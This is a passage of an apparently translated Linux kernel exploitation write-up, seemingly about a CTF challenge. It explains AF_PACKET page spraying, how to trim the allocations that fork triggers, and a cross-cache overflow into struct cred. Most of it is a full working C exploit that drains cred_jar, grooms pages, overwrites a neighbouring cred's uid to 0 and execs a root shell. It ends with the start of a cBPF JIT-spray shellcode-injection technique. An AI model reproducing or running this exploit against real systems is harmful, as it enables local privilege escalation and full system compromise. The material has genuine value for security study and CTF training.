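get_order() is what turns tp_block_size into the page order passed to __get_free_pages(). Here is a userland equivalent, assuming 4 KB pages (PAGE_SHIFT 12) and following the kernel's definition: the smallest order with (PAGE_SIZE << order) >= size. page_order is a name chosen for this sketch.

```c
#include <assert.h>

#define PAGE_SHIFT 12

/* Smallest order such that (4096 << order) >= size; size must be non-zero. */
int page_order(unsigned long size)
{
    int order = 0;
    size = (size - 1) >> PAGE_SHIFT;
    while (size) {
        order++;
        size >>= 1;
    }
    return order;
}
```

So a tp_block_size of 0x1000 yields order-0 pages, while 0x8000 yields order-3 blocks (8 contiguous pages each).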

Finally, packet_set_ring() calls init_prb_bdqc():

switch (po->tp_version) {
case TPACKET_V3:
/* Block transmit is not supported yet */
if (!tx_ring) {
init_prb_bdqc(po, rb, pg_vec, req_u);

...

}

init_prb_bdqc copies the ring buffer parameters into struct packet_ring_buffer.prb_bdqc and computes derived values from them. It then sets up the block retire timer and finally calls prb_open_block to initialize the first block.

static void init_prb_bdqc(struct packet_sock *po,
struct packet_ring_buffer *rb,
struct pgv *pg_vec,
union tpacket_req_u *req_u)
{
struct tpacket_kbdq_core *p1 = GET_PBDQC_FROM_RB(rb);
struct tpacket_block_desc *pbd;

memset(p1, 0x0, sizeof(*p1));

p1->knxt_seq_num = 1;
p1->pkbdq = pg_vec;
pbd = (struct tpacket_block_desc *)pg_vec[0].buffer;
p1->pkblk_start = pg_vec[0].buffer;
p1->kblk_size = req_u->req3.tp_block_size;
p1->knum_blocks = req_u->req3.tp_block_nr;
p1->hdrlen = po->tp_hdrlen;
p1->version = po->tp_version;
p1->last_kactive_blk_num = 0;
po->stats.stats3.tp_freeze_q_cnt = 0;
if (req_u->req3.tp_retire_blk_tov)
p1->retire_blk_tov = req_u->req3.tp_retire_blk_tov;
else
p1->retire_blk_tov = prb_calc_retire_blk_tmo(po,
req_u->req3.tp_block_size);
p1->tov_in_jiffies = msecs_to_jiffies(p1->retire_blk_tov);
p1->blk_sizeof_priv = req_u->req3.tp_sizeof_priv;
rwlock_init(&p1->blk_fill_in_prog_lock);

p1->max_frame_len = p1->kblk_size - BLK_PLUS_PRIV(p1->blk_sizeof_priv);
prb_init_ft_ops(p1, req_u);
prb_setup_retire_blk_timer(po);
prb_open_block(p1, pbd);
}

One thing prb_open_block() does is set struct tpacket_kbdq_core->nxt_offset to just past the block's private area:

static void prb_open_block(struct tpacket_kbdq_core *pkc1,
struct tpacket_block_desc *pbd1)
{
...

pkc1->pkblk_start = (char *)pbd1;
pkc1->nxt_offset = pkc1->pkblk_start + BLK_PLUS_PRIV(pkc1->blk_sizeof_priv);

...
}

With that, we have a page-granular allocation primitive in the kernel, which is exactly what page-level heap feng shui needs.

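Note that BitsByWill's writeup does not follow the p0 approach exactly. It uses TPACKET_V1/TPACKET_V2 and creates a PACKET_TX_RING buffer instead. The difference from PACKET_RX_RING was mentioned briefly in the code comments above, and it does not affect the page allocation, as this part of packet_setsockopt() shows: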

case PACKET_RX_RING:
case PACKET_TX_RING:
{
union tpacket_req_u req_u;
int len;

lock_sock(sk);
switch (po->tp_version) {
case TPACKET_V1:
case TPACKET_V2:
len = sizeof(req_u.req);
break;
case TPACKET_V3:
default:
len = sizeof(req_u.req3);
break;
}
if (optlen < len) {
ret = -EINVAL;
} else {
if (copy_from_sockptr(&req_u.req, optval, len))
ret = -EFAULT;
else
ret = packet_set_ring(sk, &req_u, 0,
optname == PACKET_TX_RING);
}
release_sock(sk);
return ret;
}

The two cases barely differ at allocation time: both end up in packet_set_ring(), whose remaining steps were covered above.

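One more point. Because we are calling straight into the page allocator, what we really control is the order. That order is determined by the tp_block_size we pass in (req_u->req.tp_block_size). Following packet_setsockopt() into packet_set_ring() confirms this: the order is computed as get_order(req->tp_block_size).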
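To make the size-to-order relationship concrete, here is a small userland sketch of the rounding rule, assuming 4 KiB pages. block_order is a hypothetical helper that only mimics what the kernel's get_order() computes for tp_block_size. It is not kernel code.

```c
#include <assert.h>
#include <stddef.h>

/* Assumption: 4 KiB pages, as on the x86-64 challenge kernels. */
#define SKETCH_PAGE_SIZE 4096UL

/* Hypothetical helper: smallest order such that
 * (SKETCH_PAGE_SIZE << order) >= size, i.e. the rounding rule of get_order(). */
static unsigned int block_order(size_t size)
{
    unsigned int order = 0;

    while ((SKETCH_PAGE_SIZE << order) < size)
        order++;
    return order;
}
```

Under this rule, alloc_pages_via_sock(4096, 1) in the exploit below requests exactly one order_0 block per socket. Larger block sizes jump straight to higher orders: 12288 bytes already needs an order_2 block.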

To free those block_nr blocks of that order again, we simply close the corresponding socket fd. One problem remains, though:

The only issue is that default low privileged users can’t utilize these functions in the root namespace

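In other words, a default low-privileged user cannot use these functions in the root namespace. On many Linux systems, however, we can create our own unprivileged user namespace.

We could instead exhaust the free_list of a given order by massively spraying some data structure, the classic example being msg_msg. That approach has two drawbacks. It allocates from the generic slab caches, which is not very reliable. More importantly, this challenge has disabled it anyway :^(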

Initial plan

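The challenge author suggests a very elegant escalation technique: overwrite a cred. Its beauty is that we never have to worry about KASLR, address leaks or building a ROP chain. In current kernels, cred objects live in their own kmem_cache named cred_jar.

The plan runs in five steps:

1. Drain cred_jar. From then on the allocator has to take fresh order_0 pages from the buddy system, splitting higher-order blocks as needed.
2. Free part of our pages, but not adjacent ones, so that they cannot coalesce back into a higher order.
3. Spray creds again.
4. Free some more pages.
5. Spray the attack objects.

At least one attack object must land in the slab directly before a slab holding creds.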

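How do we spray lots of creds? Simply fork many child processes. Fork produces a lot of noise (allocations of unrelated objects along the way), but according to the author this does not hurt the initial spray.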

Dealing with fork noise

Page-level heap feng shui is very sensitive to what gets allocated, so we want to keep fork's noise to a minimum.

The core of fork is kernel_clone(), so keep that function in mind. If a traditional fork sets none of the flags in kernel_clone_args, the following happens:

  1. kernel_clone() calls copy_process().

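  2. copy_process() calls dup_task_struct(), which allocates a task_struct from its cache; on the target system that cache is backed by order_2 pages. dup_task_struct() then calls alloc_thread_stack_node(). If no cached stack is available, that function uses __vmalloc_node_range() to allocate a virtually contiguous 16 KB region for the kernel thread stack, which usually takes four order_0 pages.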

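  3. The vmalloc above allocates a kmalloc-64 chunk to help set up the vmalloc mapping. The kernel then allocates two vmap_area chunks from vmap_area_cachep. On this system and kernel, the first comes from alloc_vmap_area() and the second probably from preload_this_cpu_lock().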

  4. copy_process() then calls copy_creds(), which allocates a new cred through prepare_creds(). This step is skipped when CLONE_THREAD is set, because the parent's cred is then shared:

    int copy_creds(struct task_struct *p, unsigned long clone_flags)
    {
    struct cred *new;
    int ret;

    #ifdef CONFIG_KEYS_REQUEST_CACHE
    p->cached_requested_key = NULL;
    #endif

    if (
    #ifdef CONFIG_KEYS
    !p->cred->thread_keyring &&
    #endif
    clone_flags & CLONE_THREAD
    ) {
    p->real_cred = get_cred(p->cred);
    get_cred(p->cred);
    alter_cred_subscribers(p->cred, 2);
    kdebug("share_creds(%p{%d,%d})",
    p->cred, atomic_read(&p->cred->usage),
    read_cred_subscribers(p->cred));
    inc_rlimit_ucounts(task_ucounts(p), UCOUNT_RLIMIT_NPROC, 1);
    return 0;
    }

    new = prepare_creds();

    ...

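  5. copy_process() then runs a series of copy_*() functions, one per resource the new process needs. Each of them allocates memory unless its CLONE_* flag is set. For a plain fork you would expect new chunks from files_cache, fs_cache, sighand_cache and signal_cache.

     The biggest source of noise is building the mm_struct when CLONE_VM is not set. That triggers a lot of allocation activity in the vm_area_struct, anon_vma_chain and anon_vma caches, all backed by order_0 pages on this system: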

    if (retval)
    goto bad_fork_cleanup_audit;
    retval = copy_semundo(clone_flags, p);
    if (retval)
    goto bad_fork_cleanup_security;
    retval = copy_files(clone_flags, p, args->no_files);
    if (retval)
    goto bad_fork_cleanup_semundo;
    retval = copy_fs(clone_flags, p);
    if (retval)
    goto bad_fork_cleanup_files;
    retval = copy_sighand(clone_flags, p);
    if (retval)
    goto bad_fork_cleanup_fs;
    retval = copy_signal(clone_flags, p);
    if (retval)
    goto bad_fork_cleanup_sighand;
    retval = copy_mm(clone_flags, p);
    if (retval)
    goto bad_fork_cleanup_signal;
    retval = copy_namespaces(clone_flags, p);
    if (retval)
    goto bad_fork_cleanup_mm;
    retval = copy_io(clone_flags, p);
    if (retval)
    goto bad_fork_cleanup_namespaces;
    retval = copy_thread(p, args);
    if (retval)
    goto bad_fork_cleanup_io;

  6. Finally, the kernel allocates a pid chunk, whose slab also comes from order_0 pages.

Ignoring vmalloc and focusing only on slab allocations, a single fork on this system triggers the following allocations:

task_struct
kmalloc-64
vmap_area
vmap_area
cred_jar
files_cache
fs_cache
sighand_cache
signal_cache
mm_struct
vm_area_struct
vm_area_struct
vm_area_struct
vm_area_struct
anon_vma_chain
anon_vma
anon_vma_chain
vm_area_struct
anon_vma_chain
anon_vma
anon_vma_chain
vm_area_struct
anon_vma_chain
anon_vma
anon_vma_chain
vm_area_struct
anon_vma_chain
anon_vma
anon_vma_chain
vm_area_struct
anon_vma_chain
anon_vma
anon_vma_chain
vm_area_struct
vm_area_struct
pid

That is a lot of noise. BitsByWill went through the source code and the clone(2) man page and found that the following flags drastically reduce the noise fork produces:

CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND

With these flags set, the noise drops to:

task_struct
kmalloc-64
vmap_area
vmap_area
cred_jar
signal_cache
pid
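The two lists above can be captured in a tiny model. It is only a sketch built from the allocation lists in this write-up and does not query the kernel. fork_slab_allocs is a hypothetical helper that counts the slab allocations one process creation triggers, depending on which sharing flags are set. The flag values come from <sched.h>.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <sched.h>

/* The noise-reducing mask discussed above, parenthesised so it composes safely. */
#define QUIET_CLONE_FLAGS (CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND)

/* Hypothetical model of the lists above (slab allocations only, vmalloc ignored).
 * Always present without CLONE_THREAD: task_struct, kmalloc-64, 2x vmap_area,
 * cred_jar, signal_cache and pid, i.e. 7 allocations. */
static int fork_slab_allocs(unsigned long flags)
{
    int n = 7;

    if (!(flags & CLONE_FILES))
        n += 1;            /* files_cache */
    if (!(flags & CLONE_FS))
        n += 1;            /* fs_cache */
    if (!(flags & CLONE_SIGHAND))
        n += 1;            /* sighand_cache */
    if (!(flags & CLONE_VM))
        n += 26;           /* mm_struct plus the vm_area_struct/anon_vma* run */
    return n;
}
```

The CLONE_VM term dominates. Sharing the address space alone removes 26 of the 36 allocations, which is why it matters most for the spray.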

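Note that there are still four order_0 pages coming from vmalloc, but that is acceptable. The remaining catch is that the child cannot really write to any process memory, because it shares the parent's virtual memory. We must therefore use shellcode that relies only on registers to check whether the escalation succeeded.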

4. Exploitation

With all that background in place, here is an overview of the exploit:

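  1. Use packet_setsockopt() to spray a large number of order_0 blocks, then free every other page. This leaves many free order_0 pages that cannot coalesce into order_1. The primitive is only usable inside a user namespace, so the exploit first forks a child that creates and enters a new user namespace; that child performs all page allocations.
  2. Call clone many times with the flags above to allocate our cred objects. Then free the remaining order_0 pages and spray the vulnerable objects. The result is a layout in which a page holding vulnerable objects sits directly before a page holding creds.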
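The alternating layout these two steps aim for can be illustrated with a toy model. It is a deliberate simplification that assumes:

- the sprayed pages come out physically contiguous from one split high-order block;
- each freed page is reused by the very next order_0 request;
- there is no noise.

simulate_layout and the page labels are hypothetical. They only show why every vulnerable page ends up directly in front of a cred page.

```c
#include <assert.h>
#include <stddef.h>

enum owner { PG_FREE, PG_SOCKET, PG_CRED, PG_VULN };

/* Hand the lowest-indexed free page to `who`, mimicking "the next order_0
 * request reuses a freed page" in this idealised model. */
static int take_free(enum owner *pages, size_t n, enum owner who)
{
    for (size_t i = 0; i < n; i++) {
        if (pages[i] == PG_FREE) {
            pages[i] = who;
            return (int)i;
        }
    }
    return -1;
}

static void simulate_layout(enum owner *pages, size_t n)
{
    size_t i;

    for (i = 0; i < n; i++)          /* spray: every page held by a socket */
        pages[i] = PG_SOCKET;
    for (i = 1; i < n; i += 2)       /* free the odd pages, keep the even ones */
        pages[i] = PG_FREE;
    while (take_free(pages, n, PG_CRED) >= 0)
        ;                            /* cred slabs land in the odd holes */
    for (i = 0; i < n; i += 2)       /* free the even pages */
        pages[i] = PG_FREE;
    while (take_free(pages, n, PG_VULN) >= 0)
        ;                            /* vulnerable slabs land in the even holes */
}
```

In the real exploit, noise (for example the four vmalloc pages per clone) shifts some of these slots. That is why the exploit sprays many pages and many creds instead of relying on one exact pair.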

Step I: Preparation

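As noted when analyzing the page allocation primitive, it cannot be used from the root namespace. So we fork a child and call unshare() in it to create and enter a new user namespace. This guarantees that the child can use the page allocation primitive.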

The page spray itself is driven over pipes. The parent sends commands to the child and reads back the results, with the child acting as the command manager.
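The command/reply protocol between the parent and the manager child can be sketched without any AF_PACKET code. In this simplified, runnable version, the manager only records which slots are "allocated" in a local array instead of opening packet sockets; start_manager, send_cmd and stop_manager are hypothetical names. The parent writes an ipc_req_t into one pipe and blocks until the manager echoes the index back through the other. This is the same handshake that send_spray_cmd() and spray_comm_handler() use in the exploit below.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

enum spray_cmd { ALLOC_PAGE, FREE_PAGE, EXIT_SPRAY };
typedef struct { enum spray_cmd cmd; int32_t idx; } ipc_req_t;

static int to_child[2], to_parent[2];
static pid_t manager_pid;

/* Child side: stand-in for spray_comm_handler(). A real manager would
 * unshare() into a new user namespace and open/close packet sockets here. */
static void manager_loop(void)
{
    bool slots[1024] = { false };
    ipc_req_t req;

    while (read(to_child[0], &req, sizeof(req)) == (ssize_t)sizeof(req)) {
        if (req.idx >= 0 && req.idx < 1024) {
            if (req.cmd == ALLOC_PAGE)
                slots[req.idx] = true;
            else if (req.cmd == FREE_PAGE)
                slots[req.idx] = false;
        }
        write(to_parent[1], &req.idx, sizeof(req.idx)); /* acknowledge */
        if (req.cmd == EXIT_SPRAY)
            break;
    }
    _exit(0);
}

static int start_manager(void)
{
    if (pipe(to_child) < 0 || pipe(to_parent) < 0)
        return -1;
    manager_pid = fork();
    if (manager_pid < 0)
        return -1;
    if (manager_pid == 0)
        manager_loop();   /* never returns */
    return 0;
}

/* Parent side: same handshake as send_spray_cmd(); returns the echoed index. */
static int32_t send_cmd(enum spray_cmd cmd, int32_t idx)
{
    ipc_req_t req = { .cmd = cmd, .idx = idx };
    int32_t ack = -1;

    write(to_child[1], &req, sizeof(req));
    read(to_parent[0], &ack, sizeof(ack));
    return ack;
}

static int stop_manager(void)
{
    int status = 0;

    send_cmd(EXIT_SPRAY, 0);
    waitpid(manager_pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Because send_cmd() blocks until the acknowledgement arrives, every allocation or free has completed in the manager before the parent issues the next clone or spray. That ordering is what the page layout depends on.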

Step II: Drain cred_jar

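We drain cred_jar so that the later process creations get fresh pages from the buddy system. Those later creations do not use fork() but the more flexible clone system call. It does essentially the same thing while giving finer control, for example over which flags are used.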

Step III: Spray lots of pages

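Now the manager child can spray single pages with setsockopt. Keep in mind which namespace matters:

- We want root in the original root namespace, but the manager lives in its own namespace.
- The victim objects, the creds, must therefore belong to freshly cloned children. Unless configured otherwise, those children stay in the root namespace like their parent.
- Only then do we actually change the privileges of a process in the root namespace.

The spray forces the higher-order blocks to be split and handed out. Afterwards we free only the second page of every pair.

Why are these pages handed out in order? Pages split from a higher-order buddy block are physically contiguous, so we end up with an alternating pattern of held and freed pages.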

Step IV: Allocate the victim pages

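As the victim structure we use struct cred, discussed above. Its first field is the 4-byte usage counter, immediately followed by uid on this kernel. Our 6-byte overflow is therefore enough: it sets usage to 1 and clears the low two bytes of uid.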

This step has some noise, namely the extra four order_0 pages per clone from vmalloc.

Step V: Allocate the vulnerable objects

We free the remaining sprayed pages from Step III so that the vulnerable objects get allocated into them.

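This gives us the cross-cache overflow. During the mass out-of-bounds writes we hit the first six bytes of some child's cred, writing a 4-byte 1 followed by two zero bytes. Those two bytes exactly cover the original uid 0x3E8 (1000) and turn it into 0.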
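Why six bytes are enough can be checked with a small model of the start of struct cred. The model rests on three assumptions:

- uid immediately follows the 4-byte usage counter, with no CONFIG_DEBUG_CREDENTIALS fields in between.
- The machine is little-endian x86-64.
- The six overflowing bytes are the tail of the 512-byte user buffer, as in the exploit's evil[CHUNK_SIZE - 6].

cred_head and apply_overflow are hypothetical names used only for illustration.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define CHUNK_SIZE 512

/* Simplified head of struct cred (assumption: uid directly follows usage). */
struct cred_head {
    uint32_t usage;  /* atomic_t usage */
    uint32_t uid;    /* kuid_t uid */
    uint32_t gid;    /* kgid_t gid */
};

/* Copy the 6 overflowing bytes from the tail of the user buffer onto the
 * first 6 bytes of the neighbouring cred, as the cross-cache overflow does. */
static void apply_overflow(struct cred_head *victim, const uint8_t *evil)
{
    memcpy(victim, evil + CHUNK_SIZE - 6, 6);
}
```

The high half of uid is already zero for uid 1000 (0x000003e8), so clearing the low two bytes is enough to make it 0. usage is set to 1 rather than 0 so that the reference count stays valid.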


The final exploit:

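/* The inline asm uses Intel syntax, so build with -masm=intel, e.g. gcc -static -masm=intel -o exp exp.c */
#define _GNU_SOURCE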
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sched.h>
#include <assert.h>
#include <time.h>
#include <sys/socket.h>
#include <stdbool.h>

#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:0x%lx\n", str, x)

void info_log(char* str){
printf("\033[0m\033[32m[+]%s\033[0m\n",str);
}

void error_log(char* str){
printf("\033[0m\033[1;31m[-]%s\033[0m\n",str);
exit(1);
}



#define ALLOC 0xcafebabe
#define DELETE 0xdeadbabe
#define EDIT 0xf00dbabe

#define CLONE_FLAGS (CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND)

typedef struct
{
int64_t idx;
uint64_t size;
char *buf;
}user_req_t;

struct tpacket_req{
unsigned int tp_block_size;
unsigned int tp_block_nr;
unsigned int tp_frame_size;
unsigned int tp_frame_nr;
};

enum tpacket_versions {
TPACKET_V1,
TPACKET_V2,
TPACKET_V3,
};

#define PACKET_VERSION 10
#define PACKET_TX_RING 13

#define FORK_SPRAY 320
#define CHUNK_SIZE 512
#define ISO_SLAB_LIMIT 8

#define CRED_JAR_INITIAL_SPRAY 32

#define INITIAL_PAGE_SPRAY 1000
#define FINAL_PAGE_SPRAY 30

typedef struct
{
bool in_use;
int idx[ISO_SLAB_LIMIT];
}full_page;

enum spray_cmd {
ALLOC_PAGE,
FREE_PAGE,
EXIT_SPRAY,
};

typedef struct
{
enum spray_cmd cmd;
int32_t idx;
}ipc_req_t;

/* Pages of vulnerable objects sprayed in the final step */
full_page isolation_pages[FINAL_PAGE_SPRAY] = {0};

int rootfd[2];
int sprayfd_child[2];
int sprayfd_parent[2];
int socketfds[INITIAL_PAGE_SPRAY];

int64_t ioctl(int fd, unsigned long request, unsigned long param){
long result = syscall(16, fd, request, param);
if(result < 0)
perror("ioctl on driver");
return result;
}

int64_t alloc(int fd){
return ioctl(fd, ALLOC, 0);
}

int64_t edit(int fd, int64_t idx, uint64_t size, char* buf){
user_req_t req = {.idx = idx, .size = size, .buf = buf};
return ioctl(fd, EDIT, (unsigned long)&req);
}

void debug(){
puts("<STAR PLATINUM, THE WORLD!>");
getchar();
return;
}

void unshare_setup(uid_t uid, gid_t gid)
{
int temp;
char edit[0x100];
unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET); //Create new namespace and get in
temp = open("/proc/self/setgroups", O_WRONLY);
write(temp, "deny", strlen("deny"));
close(temp);
temp = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", uid);
write(temp, edit, strlen(edit));
close(temp);
temp = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", gid);
write(temp, edit, strlen(edit));
close(temp);
return;
}
/* *
* __clone - clone syscall in /kernel/fork.c
* @flags: clone flags
* @dest: the ptr of the user_stack
* */
__attribute__((naked)) pid_t __clone(uint64_t flags, void *dest)
{
asm("mov r15, rsi;"
"xor rsi, rsi;"
"xor rdx, rdx;"
"xor r10, r10;"
"xor r9, r9;"
"mov rax, 56;"
"syscall;"
"cmp rax, 0;"
"jl bad_end;"
"jg good_end;"
"jmp r15;"
"bad_end:"
"neg rax;"
"ret;"
"good_end:"
"ret;");
}

struct timespec timer = {.tv_sec = 1000000000, .tv_nsec = 0};
char throwaway;
char root[] = "root\n";
char binsh[] = "/bin/sh\x00";
char *args[] = {"/bin/sh", NULL};

__attribute__((naked)) void check_and_wait()
{
asm(
"lea rax, [rootfd];"
"mov edi, dword ptr [rax];"
"lea rsi, [throwaway];"
"mov rdx, 1;"
"xor rax, rax;"
"syscall;" //read(rootfd, throwaway, 1)
"mov rax, 102;"
"syscall;" //getuid()
"cmp rax, 0;" // not root, goto finish
"jne finish;"
"mov rdi, 1;"
"lea rsi, [root];"
"mov rdx, 5;"
"mov rax, 1;"
"syscall;" //write(1, root, 5)
"lea rdi, [binsh];"
"lea rsi, [args];"
"xor rdx, rdx;"
"mov rax, 59;"
"syscall;" //execve("/bin/sh", args, 0)
"finish:"
"lea rdi, [timer];"
"xor rsi, rsi;"
"mov rax, 35;"
"syscall;" //nanosleep()
"ret;");
}

/* Keep the cred_jar-draining children alive (and their creds allocated) */
void just_wait(){
sleep(1000000000);
}

/* *
* alloc_pages_via_sock - page allocation primitive
* @size: once order-* allocation in page level
* @n: the times you want to allocate
* Return: the new socket fd
* */
int alloc_pages_via_sock(uint32_t size, uint32_t n){
struct tpacket_req req;
int32_t socketfd, version;

/* Create the AF_PACKET socket */
socketfd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if(socketfd < 0){
error_log("Create the AF_PACKET socket failed...");
}

version = TPACKET_V1;

/* Set the ring buffer version */
if(setsockopt(socketfd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version)) < 0)
{
error_log("setsockopt PACKET_VERSION failed...");
}

assert(size % 4096 == 0); //size must be a multiple of the 4096-byte page size

memset(&req, 0, sizeof(req));
req.tp_block_size = size;
req.tp_block_nr = n;
req.tp_frame_size = 4096;
req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr)/req.tp_frame_size;

/* Allocate the PACKET_TX_RING type ring buffer */
if(setsockopt(socketfd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req)) < 0)
{
error_log("setsocketopt PACKET_TX_RING failed!");
}

return socketfd;
}

void spray_comm_handler(){
ipc_req_t req;
int32_t result;

do{
read(sprayfd_child[0], &req, sizeof(req));
assert(req.idx < INITIAL_PAGE_SPRAY);
if(req.cmd == ALLOC_PAGE){
socketfds[req.idx] = alloc_pages_via_sock(4096, 1);
}else if (req.cmd == FREE_PAGE){
close(socketfds[req.idx]);
}
result = req.idx;
write(sprayfd_parent[1], &result, sizeof(result));
}while(req.cmd != EXIT_SPRAY);
}

void send_spray_cmd(enum spray_cmd cmd, int idx){
ipc_req_t req;
int32_t result;

req.cmd = cmd;
req.idx = idx;
/* write to child manager for cmd */
write(sprayfd_child[1], &req, sizeof(req));
/* read from parent pipe which just been writen by child manager */
read(sprayfd_parent[0], &result, sizeof(result));
assert(result == idx);
}

void alloc_vuln_page(int fd, full_page *arr, int page_idx){
assert(!arr[page_idx].in_use);
for(int i = 0; i < ISO_SLAB_LIMIT; i++){
long result = alloc(fd);
if(result < 0){
error_log("Allocation vuln page error...");
}
arr[page_idx].idx[i] = result;
}
arr[page_idx].in_use = true;
}

void edit_vuln_page(int fd, full_page *arr, int page_idx, uint8_t *buf, size_t sz){
assert(arr[page_idx].in_use);
for(int i = 0; i < ISO_SLAB_LIMIT; i++){
long result = edit(fd, arr[page_idx].idx[i], sz, buf);
if(result < 0){
error_log("edit error...");
}
}
}

int main(int argc, char **argv){

info_log("Step I: Open the vulnerable driver...");
int fd = open("/dev/castaway", O_RDONLY);
if(fd < 0){
error_log("Driver open failed!");
}

info_log("Step II: Construct two pipe for communicating in those namespace...");
pipe(sprayfd_child);
pipe(sprayfd_parent);

info_log("Step III: Setting up spray manager in separate namespace...");
if(!fork()){
unshare_setup(getuid(), getgid());
spray_comm_handler();
}
/* For communicating with the fork later */
pipe(rootfd);
char evil[CHUNK_SIZE];
memset(evil, 0, sizeof(evil));

info_log("Step IV: Draining Start!");
puts("[*]draining cred_jar...");
for(int i = 0; i < CRED_JAR_INITIAL_SPRAY; i++){
pid_t result = fork();
if(!result){
just_wait();
}
if(result < 0){
error_log("fork limit...");
}
}
puts("[*]draining Buddysystem, of course order 0 :)");
for(int i = 0; i < INITIAL_PAGE_SPRAY; i++){
send_spray_cmd(ALLOC_PAGE, i);
}
/* Free every other page (odd indices) so the freed pages cannot coalesce */
for(int i = 1; i < INITIAL_PAGE_SPRAY; i += 2){
send_spray_cmd(FREE_PAGE, i);
}
for(int i = 0; i < FORK_SPRAY; i++){
pid_t result = __clone(CLONE_FLAGS, &check_and_wait);
if(result < 0){
error_log("clone error...");
}
}
for(int i = 0; i < INITIAL_PAGE_SPRAY; i += 2){
send_spray_cmd(FREE_PAGE, i);
}

*(uint32_t *)&evil[CHUNK_SIZE - 0x6] = 1;
puts("[*]Spraying cross cache overflow...");
for(int i = 0; i < FINAL_PAGE_SPRAY; i++){
alloc_vuln_page(fd, isolation_pages, i);
edit_vuln_page(fd, isolation_pages, i, evil, CHUNK_SIZE);
}
write(rootfd[1], evil, FORK_SPRAY);
sleep(10000);
exit(0);
}

IX. shellcode injection

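As the title says, this technique injects shellcode. It is usually done through the bpf system call (Berkeley Packet Filter). With the right options, bpf lets us write executable code into the kernel.

The syscall also lets processes set up channels to the kernel, such as maps, which are collections of key-value pairs. The code we inject can be attached to a process to act as a filter or to implement logging.

For a detailed introduction, see the Anquanke article in the references. It translates and explains the official Linux man pages and includes hands-on experiments, which makes it very approachable.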

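Back to exploitation. In most cases the bpf system call requires root, so during privilege escalation we can mostly forget about it. Other system calls offer similar functionality, though. The best known is prctl, which many sandboxes use to filter system calls according to a set of rules.

The source shows that one of prctl's call paths shares the second half of bpf's pipeline: both use BPF bytecode and JIT compilation. Passing PR_SET_SECCOMP installs a piece of BPF code as our filter. The calls involved are roughly: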

sys_prctl
prctl_set_seccomp
seccomp_set_mode_filter
seccomp_prepare_user_filter
seccomp_prepare_filter
bpf_prog_create_from_user
bpf_prepare_filter
bpf_migrate_filter
bpf_prog_select_runtime
bpf_int_jit_compile
bpf_jit_binary_alloc
bpf_jit_alloc_exec

In short: we call prctl and pass in our BPF program, which must be BPF bytecode. The program is copied into kernel memory, then JIT (just-in-time) compiled by bpf_int_jit_compile() and kept in the kernel. Here is how we can abuse this.

First, the format of BPF instructions:

The original BPF instructions, also called cBPF (classic BPF), are defined in the kernel source as follows:

/*
* Try and keep these values and structures similar to BSD, especially
* the BPF code definitions which need to match so you can share filters
*/

struct sock_filter { /* Filter block */
__u16 code; /* Actual filter code */
__u8 jt; /* Jump true */
__u8 jf; /* Jump false */
__u32 k; /* Generic multiuse field */
};

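The code field takes 2 bytes. It is followed by the jump fields, which we can ignore for now, and finally by the multi-purpose field k. In this injection technique we mostly use k as an immediate.

The kernel does have a defense against this: the constant blinding performed in bpf_jit_blind_constants(), which keeps the original immediates out of the JIT output. The challenge below does not enable it. To see how to exploit immediates, consider the following scenario.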

First, the basic cBPF instruction classes:

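#define BPF_LD      0x00    /* load a value into the accumulator A */
#define BPF_LDX     0x01    /* load a value into the index register X */
#define BPF_ST      0x02    /* store A into scratch memory M[k] */
#define BPF_STX     0x03    /* store X into scratch memory M[k] */
#define BPF_ALU     0x04    /* arithmetic/logic operation on A */
#define BPF_JMP     0x05    /* conditional/unconditional jump */
#define BPF_RET     0x06    /* return from the filter */
#define BPF_MISC    0x07    /* register transfers between A and X */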
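The opcode used for the sled, 0x00, is BPF_LD | BPF_W | BPF_IMM, which loads the 32-bit immediate k into A. The 0x06 that ends the exploit's program is BPF_RET | BPF_K. The short sketch below assembles such a program with the BPF_STMT macro from <linux/filter.h>. build_sled is a hypothetical helper, and SECCOMP_RET_ALLOW comes from <linux/seccomp.h>.

```c
#include <assert.h>
#include <stddef.h>
#include <linux/filter.h>
#include <linux/seccomp.h>

/* Fill prog[0..n-2] with "A = k" loads carrying the sled/shellcode constant,
 * and end with "return SECCOMP_RET_ALLOW" so the filter stays valid. */
static void build_sled(struct sock_filter *prog, size_t n, __u32 k)
{
    for (size_t i = 0; i + 1 < n; i++)
        prog[i] = (struct sock_filter)BPF_STMT(BPF_LD | BPF_W | BPF_IMM, k);
    prog[n - 1] = (struct sock_filter)BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW);
}
```

This produces the same {0x00, 0, 0, k} and {0x06, 0, 0, 0x7fff0000} entries that the exploit fills in by hand.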

So if we store many instructions of the form [0x00, 0, 0, 0x90909090], the JIT-compiled code in memory looks like this:

b8 90 90 90 90			mov eax, 0x90909090
b8 90 90 90 90 mov eax, 0x90909090
...

But what happens if we start decoding from the second byte? It becomes:

90 			nop
90 nop
90 nop
90 nop
b8 .byte 0xb8
90
...

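This partly achieves the misaligned-instruction effect, but the 0xb8 is still in the way. We can sacrifice one byte of each immediate so that 0xb8 becomes part of a new instruction. That instruction should change as little of the machine state as possible. Candidates: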

04 b8                   add    al, 0xb8
0c b8 or al, 0xb8
14 b8 adc al, 0xb8
1c b8 sbb al, 0xb8
24 b8 and al, 0xb8
2c b8 sub al, 0xb8
34 b8 xor al, 0xb8
3c b8 cmp al, 0xb8 *
a8 b8 test al, 0xb8 *
b0 b8 mov al, 0xb8
b1 b8 mov cl, 0xb8
b2 b8 mov dl, 0xb8
b3 b8 mov bl, 0xb8
b4 b8 mov ah, 0xb8
b5 b8 mov ch, 0xb8
